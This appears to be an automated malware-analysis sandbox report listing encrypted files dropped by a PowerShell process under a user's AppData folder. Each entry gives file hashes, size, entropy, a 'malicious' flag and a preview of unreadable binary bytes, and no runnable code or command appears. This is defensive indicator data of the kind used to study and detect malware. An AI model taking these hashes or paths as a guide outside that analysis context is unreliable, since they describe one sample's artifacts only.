..%..F>.@(Nx...B2.(.x.A.@..~Y...3...e..S5....bvp...f\(........'.c....c...+......6...s..0...$ie.....R.A.oqg......wB........QA..\..Hxn..H.^..o...M_T..)d...>..%.L./..Q#.6...B.0p..A3..ff\|...)gl}.?..z)U..8..^p...2r.."..<h.v."..dK..*#`M...\...4.r,.........P...h..hG.f\H.$..g..(Q.\{K}H.mc....l.V

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xMUoSEmbBOXhdc.zHbsJxBgTkrh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	153931
Entropy (8bit):	7.998753029758024
Encrypted:	true
SSDEEP:	3072:noV5ImnDm0yTkuz/GFDoWeT/36RwXnFdrGdPn0FeYIFsxVR8:nEq0yz/GlpY6QFdrGdPdyXR8
MD5:	F0A2CC849F8C2ADFFFAE3F05FB3E697F
SHA1:	031F39B02F325B8A9B6229E5C7F9EEA77068238A
SHA-256:	4E3450A027A6FE4601D5EC85BFA5F10B9F16DFCD6BE3BB2CFE20E78CFFFD030C
SHA-512:	DC60F9AB5D7179CB3824E47E7699B8E527419CB4EBE2C50C0036F966212D321908E79E27122E70072B50F32A7F4532C6785E6E5752CF826B7C6C0798759332A7
Malicious:	true
Reputation:	unknown
Preview:	8S%Y..?..4.~........k......R@.......8.NVY.7.g\)+"G..=...9...!.A.s.Z.z;...>6..aJ./..?U.Gyy5~5wJ[.L.@..}i..Na?.\M...HY4.0h2.O.....3..H..Hz.........p....r...~%.....u..G...i.@..TH.2.-...1u.w.d#L0z.T.......[4..}.S0.O.....N...FF..+.....].J.o......P...."..U.......\|.%E...1..j....4S/..C1~.0@`I+....p}(.G...I..\.7.....DKs..^9R.O..P..I.}.B4S.....\|:.+2..S....t.w...9...h..>..y.@\.Xq.$..v.).....G...zo.v...)w...re7..........m.e~~T..........skmOe......(........K8.KS8..S.:W..^.......?&I...z."....0l.....U..\|Re. ...D..-......y~u....l..hf. <\|. .Z!`.YO..}........pQ0../y.?"..Qo..fW..e.....>f........O1.}.e...&.j.j.V.....;u..s..X.......'.$...g./.h9.a.M...dP..56J.}~.nZ....#...D.)...T....4g.........n.BT.....?...x ...;.7%.U.....0>c%.fRH.9....Ug.H.Cj.....<_s.@......0[.....x^...K9....!.8..rR.I...?k.....d..-_U.....@[.#..6..Ums1...M^......h...............$\....?..H.....!....c... .q.y.......y..l..TItB...p..f..h..5...E.p..6...<Z.?...w]....F.N.'....).Q.\|]&....f.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xZElOnSqDAPLui.mSkRcpYHlhDefib Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	122245
Entropy (8bit):	7.998492894078193
Encrypted:	true
SSDEEP:	3072:yvu/rHB6I4F/SiWIQPpCcj6R0YCCu3qcjzv4uSwUY+5:1BT4FZWJz27C73RjFSw0
MD5:	7EC8EDBC3A07BB7B4DC9259114DC91D9
SHA1:	1421F59DDF16B085F6C517CA7FE0B925B4D82087
SHA-256:	2A29C85133090E676686792D83EADAF82A79FECE99BDBB19DA0CC406737F8A35
SHA-512:	51FBC6CE0F5DF3E4881FB4CBDEF7D85ED781A75D055A7FD455F0380854BA9A5AAAD9F1AAA68418DA28B3743F16C1532CA0518DDE34631483D93B3310185BB68E
Malicious:	true
Reputation:	unknown
Preview:	..k.8CS9..P.`).+../.;..........:../..E.@k..B...(...0...kr(6.DDD.X.....&..Z..B.y....Q..:".........'..{..]A.+{B)a.R.E...^e..g.Y.2.....S....E..e.r..,VH...V.z..\.m...w,.d(..D.U0u.<,.gs.. ._....k........-~.W.<%.`.0{.L.W;;.....U.J..L.>9...p.:..r);G...e.......~Y....z.=.XP...(z........0(.k.(.+_.e.....A.~....,...Ku)......8..Z.)..7..Bo..5iQ;ge.F.6-J..-..U...<...`F2....x...,w..k...jS...:LH..wO;..\|\|;+S....H.1..L.t.6..v.Z.a.J..~.........K..^cC...3.N...x.p..F.2.k..H.;]IA.R...D.~,R.0#.y....;..PM.QagE...U........W..:.........p...I9I\|($.g[<..4.ppO.b.......J.oJ.....d..!KfK....5.2 O.T...\&.....o..vFc.z.AC2R. n4..<)}....\|.....n:..{Z.&....~H.<..m......jR....~..J...%....k{......0%.S.....!...0}&..Hq.d!...39.rY.....^.....{6.3....kv......cu9.l...'....R.(.+........R.)....k..,.v.t.'.]2.e...Sg...m..S/Q....x....+.c...9.u..!.7."..x....N..1c;3..G<.....3X .g0..?.[P.{.KIk....9...r............/.....<....f+...Mw.D.. .a.S..^.FX..f6..~.......A.YEc?.#...dZA>...F.H<.A..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xizqtGCFdLnoUjXcDfP.OzgZjHydqclmaise Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	71633
Entropy (8bit):	7.997594862425695
Encrypted:	true
SSDEEP:	1536:r0ZPxwG9LVeF2uT4so4mlil1elmiP2f+aZ0guuZaruIRL4:YZGG9L8tT4sex6f+LgGP4
MD5:	7FB857153C6AD24FDF749455BB06527E
SHA1:	6BF3E8EB9E23B75241BE8DCC63ACFED9C310D61F
SHA-256:	3C40094C900137BAFD33DE8649E5D85D3F0E490DD416CC4E863A4739113C6284
SHA-512:	A930F288205BACC0CE371AC63DD5293C0A77C9053459B2E5FE7712E72924EFDE5BAAD21DECFF4418DF3B5C175464CFDB94E84FAAF2F9CADB848C9ECD125996CF
Malicious:	true
Reputation:	unknown
Preview:	.....{9.3C..O....K.......P...C..'X..;I.i.........`.........$.F..'.{.Kd;....:iy...4..'L..9...._...d;..L..\|.a....o+...fV.O..s.g..Kvg..>..Uq.K4...r..^.Y.?Id....:..e..p-.1.......d.....S...(P.R2M\|7...V.D.\a7..b>..[..X.v.$.H.y..b4h...Jg.U\|.nI........9....Mh.~..s.y....7..>.P...r..........TA.[..pL]j..w.........k. ...4..s...@)..A5n.>/<....+..N....y.s.(..QY...[.....-s..O.:.....#.p<..EN...B...!7..dD..#n.3...........K.......c.....I+...DX..]W...U\|......yiSQ..t...$.A../.8...,..^.@.d.\|..@..L..._..0..7...v.mO'i.n.4Hr6B.5....v.Q...+.............V..".....4....%u..+q..<.....X.f....B..o.R4h..X.'.....[uCo...N...)..3'....c06...@.I..<..x....Nl.....p.[?s..c..o8.ef..T.b}...-..-8n.k.....5v.F~...(&.....#.Hu..a..q.M.....$.[t7d....FZBR.G.?.U......b.BG.(......[.w\!..U....TBK..b~.>t.F.2qW..[[..jw.=..g..^.....,De.E... ....C.....E..PD.c.._..l....g........f.P..'.vS.46={.....pL..q."(.B...7..,..x..2...S..8:e..YD....3......v./....l>P..x....(......K........-@lL....o5

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xjNZLIaSKwTUqhG.RxpEamVHdP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88028
Entropy (8bit):	7.997971990282545
Encrypted:	true
SSDEEP:	1536:csTv6U0M2Ooetnn58/LvstE4i5T8uKNRc3daJve1Q4058DV:cCv10VOoetn58/LvgE4M8FmNak7HDV
MD5:	460825084B2E278A0525EE8BBC8279D0
SHA1:	711941A649962926750272A12E8442F840C80FF2
SHA-256:	79BF7EDBD97B086A7E7EB2DF668C9406554EB9AD17CA162241939F0EDBD235CA
SHA-512:	BAE66447B72BDE399C878A3BBE0EC14EE097556CE070BAAF536198986649D15D7A58EB33E2CA6C40DA5E8791D432BF0B99237481FF0428EDD8BFFF8800775876
Malicious:	true
Reputation:	unknown
Preview:	......D".3q.......G..`\._.UT$08_..#.uC.Sh...p.J:...h.E.i.=p..A......k.E........?.Q.;...W.2..._)...a.z..t%~.......P.c;<....l.._g=...9......FVpJ.!..H.R$.f`..V.gp.........M9g..&.........^E"z.[m.k]....81f...:.pB....Da...~.....(.j....U.t....[.\|g...A.}.k....;...~[..V.....F.."..vP.bzQ:'1.-.T..6..PN..f..c.vT....r....~.$....at.."!B.d.....G...........G..u.q.~$.1v.._.w..6.ie.D....o\|w...}..].^.j./...p..r..-0.J..KP..F...-m'e.aGp. ..N..7..O.....@.MGkr..-..j%..v.l.\|.....IpP.t? -"Z.a.R.....^../...\C..S]a.=..+...3....\..A.k.A.w.....W.A.b.-.Z......B...5..h.....H'(.+...V....Wt.E......;O..e...Y3...;s4..E\|X....!q.1]$ZC..k.a..F$..u.\|q..........a...q.u..W.VX.k64N`AQ...'L.......75."4.....3... ..nm@....$.s._.p..6....B....t.....b.y.{..G..W\.OB/!..{.*...f...u.....h....{.$.+p1d...Z.BN....~0]....K4.D..qq@....5-.6^{.s.+....J.=.m../&~.su..4.?N.P:&...'...q,..&.]'$.N..c.....4..>;.f.6.C&>..w..[.t..\Rjn$..........K.._........= .x.......):...D.......Q{........e..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xpDsoHPzFauLlg.VpQBHEPTurFvflqO Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	79366
Entropy (8bit):	7.997655712674326
Encrypted:	true
SSDEEP:	1536:AE9ECV/WrPI8kxGhvmPUpYZVlDP6dKdOVTnF4tAdoukxhOb2ky:5V+kxtUBK4VTq8olw2F
MD5:	A9ED91955501DFB2B9153FAE2B6170DA
SHA1:	AF146CEB77244C34DEFD4197E709BD5F5EAEC68C
SHA-256:	803BC411A2C4528702A74D7536012886F415BD1A1EF9305C04A17749D02D5870
SHA-512:	2AECFBF61E5A9AFE8E3D2544779EB5A8ECB35F3E8D1778B5EF3684415C6711134DDCD4BF2DA468CD5F5ACE5EA9B3429040EF061743513E8282D1901BF0634240
Malicious:	true
Reputation:	unknown
Preview:	....\.z.3.sTL..4..q......'......%.ha..o..$......E...t...J.5...Lu......vzK..#.5\%.. ..~hj.91.v......N.1..(..........})/7..<I5xJ...I2....F.x...,`.e.........MbU.L...n....I....D......`n.W.....GO'."R..6..8.sl...#...si....m.W`..[....}%.hN.(Q....Tq....!.</.h.aS.x.z....E$...w.a.......ht...I.....r..N..U..sO...d.ZV`2...9.>.>.{"Zg.",5l_...f@.-..........Yy.^..s...~%..8F..l4.."......GP...:l>...x.Z.~...B,QoU...<..s.._-z....Q...V........U.(.0..I....p....h.Y..4..(.u.9.iL%N.j..bf......9.N3.".TV.x`..i-.$..2...X...%...m....)....0i..[I.2...s....W....f.b2..\.ir..I.W7Z...j...(`.&C:[..,j.ro.M....9[....."...Z.....r%83....P.......[..F.8.0..X.[..tp.9.k.K..e(.,m :.>....&.h.8..a"][\|....M?1..~................_.....!..N....'u.e8Aq.Do..I.~.\|,.7..2..Q...............T..4`.{..W..2.k.Yu@....zO.Z.....&^...n'..$5.2k.f*\IUi/....." j>F...(md<.......G...l&..N...ub].l\|.. ._....B<S:...s,O,......g.....x...-..........N..0.@~.n-NJ.n.E.(..^..E.g1W..n.Y.<i.y^i..)..:f....\Q.WR...N.'.s

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yGhnsaQNgtPpY.eOXmrLqkzSYQgyZnh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	134384
Entropy (8bit):	7.998681048165063
Encrypted:	true
SSDEEP:	3072:8UzVsbPNWO0IEdxLjYghcwcBxE/30Y5xJhB+k:XV0VD0PdGghcwcBMZ5bh4k
MD5:	4DF6189D553DA103FBB8306EB277F7D0
SHA1:	203647052910F5856CF810A811C4ABDC8C09F9A8
SHA-256:	2206FF7D46066BA34BDA480CD90ACA0857D40D8A067DF8679DB21E1CDBB4CEA2
SHA-512:	7C15D9C16C1AE5654CF89B68858D497EF64A4D39F824F8F803FBA24D14D3B0C956BE3EEEEC296C53D123830F065EF09723C070733EA62027F7B80F9290F7130A
Malicious:	true
Reputation:	unknown
Preview:	.#.A( .C........s.=.....8....&.....A.....U.X...2.d.t.)wWR .m9..N...q..y./.#....O..."L..i.[.............+....S.PQ....,..)).4&s"..U.f.......?.'..r........u....._..9.;-m......._.....U.v9.O..3.Y..KD.5.P..6.a.te..'..U.3.....Q.p.S....D.i.q.g.k....1ah...vm7.p...W..a...=.E[=.w..3l...\...q..?.09.Y..y.N.QG.S....=G......!Z...e..6..;.S:W...)......u...i.W.A.u.YP...........~.,..c...Vy'8b.....(.R....~.,S...x....Y..@g0^.y!^.(....+w#.5......\|...\|....<l]"A+.q......$..S..Y....[J..(?yx..o.j..t......c<.^...@9.u~.m(ym[...g..........%......q.Z..io.y^:........9%@..4.G..E\\|7.tB_PLT.0y(.Xr......KZ..P.'....z<\........HW3R...(...r.3..$......q..u...KQ..lS$....ps?....6...mVG.!...w)'.{.%.\......2s.^].'......q..&=FK.....>...].-.qTP..\.mA..v.S...E.}j.m.-.?.>QK.5.1..D.\..5T7k...`aC..q..z/...@&"..4..........#..~....-.>ml...-..=V...u.]/y..c.).gl.{......`.jm.f..oA.7......aC#.....wP.u.....v. .&..k4....R1N...G.z.Z.m...!..'=...;.hLT.....\|'k.....A..(..........Q.h

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yHSDtLZrXoimRq.DQMCytjvrwL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	59623
Entropy (8bit):	7.996829723196025
Encrypted:	true
SSDEEP:	1536:BqSYiJWSTuqdNOTICw2EJTBoF4DMg1m2i:BVYiSqdNOVNF4Drdi
MD5:	7C2AEE8F4DF5238CAAAA2384EFD1666F
SHA1:	CEA74ED156C0CB5CC63C567FC55F03CF88758B3B
SHA-256:	602EA9DE81504B324C2F991F60C414979667CB9BADBF2CAB899873CE79419232
SHA-512:	FDEE6261AA064907F8EF193F51542CE85308F2CE4E0344D32AF0A585BD59BD6756F697662F7268AE3E7449A5528F45250B6EC4D8531419913AC55D88B74F3A8B
Malicious:	true
Reputation:	unknown
Preview:	C7...R.mu{...`H......c..7x..r......?...I.^>R.;.\|C9.0....G.....@TQJ..........&.g#.../t(`x.8.t......Z.M7R'.H.!.L....s.!.j\|.`.....(M..pG.zch..yW[.p....3q..H.=.!!.`.._..@.u.f...%.t...p..;(vA.AFn..^.U./G..6(W..}.?w5z...J.P3o%qv)a..._...("b.......J.[xW.j..".G.....^...R..`.7G..dpj..Nk(...........&[.v...h"X..6.A..y....Y.."l..D#.......M.J.`.3m...<.u.&..F.......9..6..4....-92#...gpA.\|F[....gB.c....$.A...+.\|.od...JD...y.[.Vq.S..../..o.B.fK.......F.(......2PM.......).\..U.E.}.@d....h...F..3.F.-xZ....L...t&..)...~..%09,[..cr3...R#J......Q..<pRA..=S..:Nh.eeQ...\|.e.L.G`.a....0#F.......xg.@j.yA.j...p<..f...WlB.9....%cS.z....E #:.yI.../......(.@..\.uG.....~.s..........\p>K2.1..S.S 1....[".Po..._..o...k.8Mw.........4x>..m..593n;.LMG..Gh.d.U..VO2HI..50.....7.=..J..F.O..+V......y...J..i0.&y.R.\|..Jx..Vn.T(..L......D.F...Em...3`.-.9.x.d@........]_..Z..(c...S.]..L......S.....j....)."...."V.}..5.N..!.hC....,..z'#;.\|.....g[.K...p.z..`Y.Q.0.m:.2...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yQPsbzFBYLpKT.zpAPCfgXVvdoSBHsQh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	56604
Entropy (8bit):	7.996768077190309
Encrypted:	true
SSDEEP:	768:Rcw705ypBVfkvW5b12NOKuBfAWYTs4sPcwb1MGCjSMl+KA884bwEObQvpIbvxpEN:FQ5ypBBkvcgwOTs9CjSQzFtUvjwAGGol
MD5:	E3979350AAFAF8580CF97111271691D2
SHA1:	494BD17186EE9CB65143465B4653FB0A64DEA1C5
SHA-256:	126B69C1DC5730A7A14AEA62F3866CAADFF1730D76D9647303B0C4FDDD577432
SHA-512:	1BADCA3ABA8ECCA1AB173C61137B7994DD10C708D6E03CD51DFC2F427822485613606228B553185D225ABF474B69ED3ADB803976E2A5AAE8BC9A4534FC05A3EC
Malicious:	true
Reputation:	unknown
Preview:	.A...W..M~2....8W.E...U@g<.P..b.wF..m..n.<....Xl..z. e...c..../.@r...[=..z.\Y.T...\.'W.'\|....%a./5...f=...EL......3...@....T......4-..57.q6{...U.....c.o...)...........2....R.H..$..1.aS)X._Xq.....!...0..fC....N..u....`..}....v.&[.yQ5y^.x...M.ln'&..). Y.......'.5.3.;^j...Qk..:e.P..1.X.,...p....Mp:r....b..S.c.....}<.<..........+Te._....F...M..N ....I.Cyj[~.g.uv^.;dK.L.Y...Q..3..-k......pt..Z..... ....v..H..;.G.B. ....z.Hv{~. ...\|{+ ..mR..D....Q......ju..2...J....{.W.$.5c`c.,=-.....<v....a(G;:.w*.P.r@....s.sY.#}`....5.1\|.7.t.B..H}..u.....-E.6$..fr! ..@.}..x.1..t,...]..H..7......C.(bc^.=.BiAbH........z..<......T......9.L.<.(.w.>..)N....[!$.{.........`...>=...\|W..i.r.:.m]...I.W..q...wt\e~p.{..>$.F.5..-.......s.n....s...}.....}....f%a.t.Jm..P.2k.\.IQ^)..o.E.qLw.b..=_f..._...l:...O........@.:.!......Z..J2...........C...cCu...}..~6.k.Y.C..(@..s9M$6.K.....myLx....^...D..G.#...].9Y.Y2.%.t.).A=...iM..N..6........?...R/....5.............n.......f.z..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yRZbeASQDvzYJqLxUBg.CaBeilsRoFxDQhTGP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	174292
Entropy (8bit):	7.998865131572791
Encrypted:	true
SSDEEP:	3072:8FPDswmvolelJssbRJMhGoIh60piFdJ6QyAgh99k/U/M3ADh8c1sdU:IPDIoQlbRJMIoI8FdsQQPdM32hx1R
MD5:	4178580A87A4A3F715D5B256D7522B13
SHA1:	896852F45EE25BB44D5972E7812D7EE832C2F59E
SHA-256:	DFC02BF11B8371EA62985456595EC73208F1AA0451163593591DE3A942AC233D
SHA-512:	2E2DEF66DE58A4CDFBD0B4AFE50B4419EB91607B79465151E0C1D249BB1BAAD30A1B076B475CCF8D3EBDA91F166E1EC8B6C6CAEB6CCC55762E68273F1C2DE42D
Malicious:	true
Reputation:	unknown
Preview:	.O...RM..jE..o.$Tr.5...sG..P&......}......b. jCBL.j'..mI..cyC.....U..Q....2~&.x....I.84z...}.UJ..W.....;...ki.....Fv....S.Vf)..y.O._.Z!.i.!..m...+........"...(`..J\t,%yWA.7<^....n.[....7.'..`%.t=..?h;S\|..-.V.\|...y....Q.......3R..a..<..us...7>.N..4..S..~\|e.l..]3..N......W.z}.L18..{c......2.....=...'o...;...;.!...zR......X.q).....%.h$L.z1..<.An)6.M.+u ...._....4.w..........^..."..@q.p.+...)V=..E..$..%`cM..<._in....L..-l....g...ze.7..M#?<u....m../\|..l......".z.....yzz..2...(..^.h..m.bS.l<.R{A..-.A.....9...G...K^D.v&....R.n..l...(e.`.Xv...../..w__........"..y.s..<...0.-..?.s./..Hq......<.._..."Bk......Z@m..j.0:..<-^..u.6.~.y._.?.l....kcj....A.Hz.W..f.N...%....\|+..........Os....[/._<..E...6`1j..C.1..5d..\|..3.d...,...\|5..+.Ik.\Z<.rbo....p..}..PJ..%...T9....rj.}]}.1.V....c3...)V4e1.....;..'q.mT3.\...........UI..$K..p0..s....F..Fdf...+..g.*.].I......2...0?nO.U\|.@... i.g..b.J.\|..d..g.3m...{Y.c.a...F..6w.y...o..]LZ.f..U.cn:..U.3...?W

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yUwDuqRetp.BgkYImWaxFvRlTN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	150464
Entropy (8bit):	7.998794978957577
Encrypted:	true
SSDEEP:	3072:82l7yme5jiUcnpOAfW5dZhk1EAWpauXi23x/6jFwbCqUV0PZs:82gmOcnpDfW7P+EAWA9238FwORV0hs
MD5:	C2DD9865A9A835B1089FC981391677AE
SHA1:	00861531B67E28B48CB42D959AEA44B7155BBACA
SHA-256:	08D4EF0788963B3F575D621649966AD4695B72FA706420B2876EC24D98E2C584
SHA-512:	4C91BF9E928CE497B01A7126280D8834D98CD51951D5033960E14E16365EADD82BE5A75EA232B971FCB812179C9FE3C352083A041C58174EFB36D42FBA62741E
Malicious:	true
Reputation:	unknown
Preview:	.kTe\|Ai..U(k...c.F...d0..9.s.U.3.....r..9....K.JZ..o.$.g..=..H7i....?..q.........M...#....{._.o'.. ...y..'m..g ...>..a..J.z~(.I..3....$AW..\|G.[....0?....\B..ss#..39..B....e...1....>N..:.5Kw%+.y.^a".......F..Y.....Ke.....u.{..........!8..k..fE......#..!.#hwQ.@......{..........r ....My.....=&b..'.}.."c..q6X].0.5.Y.]J..k.....M_..-6......,.3.Y.....h.b..$.yc...F..kW.=S.....0....].+-.-......W..eW..-.+C..Z.0.._Hy}2...!=.X..G.<.......(KsP..SA......U_..I...N..FH..3....A\|M.KbG...9".F.FSc-..;...../........TDy.lc...&....%...._@.:`.'2./..)....rR.^....q..".a.J...8?ZS<.0..2g...;5..G?8!.nQ....{.4....b..$......,Pdqt...j..S...W_......_.};.Wv...........w....0....,...~....t.3l]......m.......3.....5!.MV....a.K.....)...J...P.N@.?i...XC...iZ.z9.....'_}`....I. ..'c".@.^....[#[.a._v.....0.iv..H.\|R.h7...E...=.x.<.W....K..UK.k.....@.l.}Y.yh..d..9....5..X.....l.o.B8.,."..{..?O2..., . .Y...h...#.. r.d..^.gnL....?..."VL]..yP2l.+;....B....aqPnR:G..W...I:

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yftHNmkjwCdlP.qBURMOIiVfaQEgbTyLN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	85064
Entropy (8bit):	7.997811231104435
Encrypted:	true
SSDEEP:	1536:PiDMrI4oOk7xLBePrJhKCoidyAFvgEX106eEFnDEARzlf:Pi6InvePNhBjdyAFv+EFDNf
MD5:	D2E6EBC4C58F02D57C6098D8BFDE5070
SHA1:	E948F88B0C808A23FACA4D828666D2697C1E381C
SHA-256:	94BCA8889BEF16AD3B3D8306CA76BABF9A763CB55C1EEF08C2F946F85AED7A9F
SHA-512:	F3EF6EAC3BF1BC30E6F9F184477BEE65DCF0552A49567348F197ECD5872BACE7E389F14F4D2747D48696B52291ACCBD0ABA7E39A379D3F700B11CF00E924C737
Malicious:	true
Reputation:	unknown
Preview:	#....q...>.....u1}>.=..G7+..N...^.w].#.m.4.......&tt.u\|..w.....q/.o....uB".{9.xIV....3].......7.......M.1.b..W.rj...e.B....,i.....y....~...-..r..B87.....DH ...X........X...J..S......z..]wf.....'.`@/.....F....H..dDj..g`YA...&.WW..t..K..4.......;._......5.....I.UJl.h...3c..-v<C................r..Y.^h\Q.\|-N....4#.P.[..yl.+..b..G...4yf..4Bp.HV&G..3".l..=._0....<k.....p.d'J].#...=.k.RB._...k..)...E.{.3.m.D.,..+.i.$K..5l."hHa.!}:Fm..]R.....3v.[?.#..5.v....Z%/...F.>U..@\|.X.!9.h..ew........AM].S..02....T@kl...D.M..3..@.Fx.../l.}..b5..h`6...R."A..@. ...-.q..U...&?..r\.a..n...s.Ee/+.].!s...t..o.q+.._&.CdM.%H>...K..../.njAO.....}...?...Q..9.e.....b...b.xI.%<..O-e.V.....C......rD.e....(.#.{... `7.@6......ZU......7Ro,-...c)U..=O_.;i._.Hi.2..#..l).....T.V.s..j%x.#..~'._Z....^.z.j..1.......Z...x.h.tQg.P..-......7..F....5... bLZ.....(S...>{ ..b.Y..d`....Ru...aB}...?4.,..5.Pe;.Q.U....>"...H..9...oC%G.T..3{...cD..l.k...N..`...D.2..B.O@~....=...K....C..\|......U..c8+.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yxVDqATSIgmEaow.tCUBdJhbWXOanjxQkFm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64518
Entropy (8bit):	7.996552675868219
Encrypted:	true
SSDEEP:	768:4Rbx86BnOCV9TPPpc0JbS317NVCBgSSP85evzHdsrOtrJcg7p5Rd3rEZLmHHgKX/:W1xOau0+1JVCBoP85sz6ORx9kYYM
MD5:	017129010782592FA800FAD29AE86A55
SHA1:	B51662F814FF404FE12DB5F49EBF75ACCF1EC2B4
SHA-256:	D3211AC169C0DD4670360FA0929F33C2559601A35FD431DA864DA4DAE8E228DB
SHA-512:	9CABAB0338A0B25773E904767FF5ED1B79F5CAC0777A083C7467865CF45C5BF70155376DDB5161BBC70D3E147FDEEA5EF605A269483E4F233708D2073683383A
Malicious:	true
Reputation:	unknown
Preview:	m..y.7k-mWl.F8.....TD/kV0.1.._R...i..#.j?..\x..I.cX'"(.;#.g9......J...\|....>T....P....u.-.........;.T8".....B..!.8.NT..!..DW)......r.<..F........0.?ErwSp2'.i......a....<.....\|.D\|.\......f......jW./.,).].cn.o...$......J%....VP....,P..`.....OjU....~\;...~t....U....8.O...P{......fd.8.F..7..Z..`k..x#..NC.f84.cZ..........F..^V....&.&X..Li....L.a...^..HF..+?.....XS...rs....C..JeL`...].c.o.a+......^t.Vj.N..............2..g%.0.K:Y;..6.fr..X..O..........A...D...e.....C.<..a...Of" .s)^"b...v...zM..]$....B3B.)6....1.g.9&.YB....1Q(.BI..SS....d..OO.H[."..`..=[.....\|l?.VK..R..k.R.....,W...v.\|..C..)........`..q.L9.....D.t.'...U...A....../..6..../w.....o..[.e.$\|Q..0..&.k.q...."E..M..b...n:.9(......b.....6.=..s.f...X.d9K.!1.....N.=.l.l.b.U....F..i.= )q......s..%_)....4{.j5...@......Qw........f..S...E....&o".......JO.3...}J)]V.......J.).aC..%.........D.u.o.c.....HC.%..=..W5Tb.........A.K..f.9.6:.<{..IQ`1@4...t.....R..@.^....+.n..".8.(..l?.../bT?W{...j...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zDPqbfGvHCFRSZBm.ijsxGPLHIB Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	100581
Entropy (8bit):	7.9981817687157974
Encrypted:	true
SSDEEP:	1536:uoPb26AJ5kuGK0Upyy4ON5y6hX4c+lbVjPLmMr5A87Q0viRWBwRskTAw:nPb2nDh4257hX4c+XvW87Q0viRzTAw
MD5:	4EC8EE0E2FF5B428C5EBB054BCF987F3
SHA1:	4DCCB5F05C3D70D22FB341068D46F77C45500287
SHA-256:	338468A4FF3142A8E9004A94A2B499FD513DE770C4988A0BE27C716384B38BE5
SHA-512:	3CD3F94F8D923D5D1480488FCFA8540839E06CB4D7121724C9B61B2EDF619F027FEBF5A81F568819BF60FB3D3EBBB63AD505F8F38CAC08F4C0B9205147A43119
Malicious:	true
Reputation:	unknown
Preview:	...W.......\|..OE.{8(s.5.Bh..j.....\#..'xjV..3..^..f...h..U9..l..+i....z.w.kNj.7...h.1#.!#0n.]..[.A..f.V.9=.=........].....Ip......)..B.5.....a......UV.7...k.#.P.k.9....6..,\Y....DwF..R) P..4...{N./.b.^..-.$.....%.....9',(_.,?`h.c.{s...W.p}--(...~R.@L.6.....ps92..._..8;......y}C_...#..=^[.e........,..b...<..Tt..."0.6."Ugx.........3&..~ ...k.W.y...."f.S....!7.3....j&....!....6.939..xT\.[.h...Nt..^...9..xDU....K..M..`....}...Y2Jc.....J...@.m.........x.X..."H0....\|M!.`.yV...$..2.......C6.=$......NG..9U#.".C\|.V........."q.^my..[L..]......,#..4...Br..N2...o1....q.;..\|.q.....o..X...&..Iz.\fA.d.Q....h7..3.......0..,h......... ..GNRp.e}]:.0\.w...w....+.y....Q.r.S..V..g..Q6/..L:B.I9]?.r[....n....k..?.k.p.i.....9.8......G[..E2..oxQ.1..K}.+.)Q..\|..W.^E<#K.~$...Ni5\|....f..z.B1W$s.=......G$.'..Z...r..7~..R...pZ....6.C...^r7.Q.%.q;....t&...8.-..w.=\|........v...U.4..+\|i......0.b..}..lc...-hl*...~,q...p.5...NWX\..J;..-O.....7..?6.#....-..0....BN.8I..Z

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zJNyHIxBsoTUqM.uXPHhqoYFQBmfUaVSv Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	124630
Entropy (8bit):	7.998385698489107
Encrypted:	true
SSDEEP:	3072:UbzZk/UytdEQArFeRkligmQFev+Psj/sAzcHWFclMr5YO:EZk/ntdEQApeRkli7jkAgHWFaO
MD5:	A7F4A27D912EDE11CC9D14F71474E610
SHA1:	01252C60DCD83DDDE5C804C16BD29F21E1B291FB
SHA-256:	58F92215D0D573B9F66202BB843996723C4726CCFE7B20809BCBBA3B1B064FF9
SHA-512:	8A94398A44D4C0A52FB845DE9A54739D401784F30AAC1B07594BFEEB92A18ECC2FBDA3A67F286C66ADBC251C2CCE9034CAD5194DB7FEF508C7C81D6C2DFA2F6F
Malicious:	true
Reputation:	unknown
